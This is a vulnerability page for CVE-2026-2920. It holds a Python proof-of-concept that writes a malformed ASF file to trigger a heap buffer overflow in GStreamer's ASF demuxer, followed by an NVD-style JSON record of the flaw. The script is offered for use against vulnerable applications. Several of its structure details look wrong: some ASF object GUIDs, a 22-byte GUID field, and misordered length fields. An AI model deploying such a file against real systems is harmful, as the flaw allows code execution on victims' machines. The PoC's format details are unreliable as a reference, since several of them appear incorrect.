CVE-2026-2920

/* * CVE-2026-2920 PoC - GStreamer ASF Demuxer Heap Buffer Overflow * This PoC creates a malicious ASF file with oversized stream header data * to trigger heap buffer overflow in GStreamer's ASF demuxer component. * * Usage: python3 generate_poc.py > poc.asf * Then open poc.asf with an application using vulnerable GStreamer version */ import struct import sys def create_asf_header(): """Create ASF file header with malicious stream header""" # ASF Object Header GUID for Header Object asf_header_guid = bytes.fromhex('3026B2758E66CF11A6D900AA0062CE6C') # Header Object Size (will be updated) header_size = 104 + 78 + 50 # header + file properties + stream properties # ASF File Properties Object file_props_guid = bytes.fromhex('8CABDCA1A94739C4692D7DEB3F0B4B8B') file_props_size = 104 # ASF Stream Properties Object - This is where the vulnerability lies stream_props_guid = bytes.fromhex('B7DC0791A9F74B558F40D9B2F38A7D1D') stream_props_size = 78 # Create stream properties with oversized length field stream_type_audio = bytes.fromhex('F8699E40C2BB21D68A200D956C6677D9') # audio stream # Malicious stream properties with oversized error correction data length # This triggers the heap buffer overflow in GStreamer error_correction_data_length = 0xFFFF # Oversized value causing overflow error_correction_data = b'\x00' * error_correction_data_length # Build the PoC ASF file structure poc_data = bytearray() # ASF Header Object poc_data.extend(asf_header_guid) poc_data.extend(struct.pack('<Q', header_size)) poc_data.extend(struct.pack('<I', 3)) # number of header objects poc_data.extend(struct.pack('<I', 0x00000002)) # reserved # File Properties Object poc_data.extend(file_props_guid) poc_data.extend(struct.pack('<Q', file_props_size)) poc_data.extend(bytes.fromhex('00' * 16)) # file ID poc_data.extend(struct.pack('<Q', 0)) # file size (unknown) poc_data.extend(struct.pack('<Q', 0)) # creation date poc_data.extend(struct.pack('<Q', 0)) # data packets count poc_data.extend(struct.pack('<Q', 1000000)) # play duration poc_data.extend(struct.pack('<Q', 0)) # send duration poc_data.extend(struct.pack('<Q', 0)) # preroll poc_data.extend(struct.pack('<I', 0x00000001)) # flags poc_data.extend(struct.pack('<I', 0)) # minimum data packet size poc_data.extend(struct.pack('<I', 0)) # maximum data packet size poc_data.extend(struct.pack('<I', 0)) # maximum bitrate # Stream Properties Object with malicious data poc_data.extend(stream_props_guid) poc_data.extend(struct.pack('<Q', stream_props_size + len(error_correction_data))) poc_data.extend(stream_type_audio) poc_data.extend(bytes.fromhex('00') * 22) # error correction type GUID poc_data.extend(struct.pack('<Q', 0)) # time offset poc_data.extend(struct.pack('<H', 0)) # type-specific data length poc_data.extend(struct.pack('<H', error_correction_data_length)) # malicious oversized length poc_data.extend(struct.pack('<I', 0)) # error correction data length poc_data.extend(struct.pack('<H', 0)) # flags poc_data.extend(struct.pack('<H', 0)) # reserved poc_data.extend(error_correction_data) # Oversized data causing overflow return bytes(poc_data) if __name__ == '__main__': print('Generating CVE-2026-2920 PoC ASF file...') poc = create_asf_header() sys.stdout.buffer.write(poc) print(f'\nGenerated PoC file: {len(poc)} bytes', file=sys.stderr)

{"cve": {"id": "CVE-2026-2920", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:31.637", "lastModified": "2026-03-17T18:58:45.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GStreamer ASF Demuxer Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the processing of stream headers within ASF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28843."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por desbordamiento de búfer basado en montículo en el demuxer ASF de GStreamer. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de GStreamer. Se requiere interacción con esta biblioteca para explotar esta vulnerabilidad, pero los vectores de ataque pueden variar según la implementación.\n\nLa falla específica reside en el procesamiento de los encabezados de flujo dentro de archivos ASF. El problema se debe a la falta de validación adecuada de la longitud de los datos proporcionados por el usuario antes de copiarlos a un búfer de longitud fija basado en montículo. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-28843."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gstreamer:gstreamer:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.28.1", "matchCriteriaId": "1F1B75B8-0527-487E-8F53-A658F7A1E7A5"}]}]}], "references": [{"url": "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/37d7991168a223d0810fd1f4493ec6a8b6a510d3", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-164/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}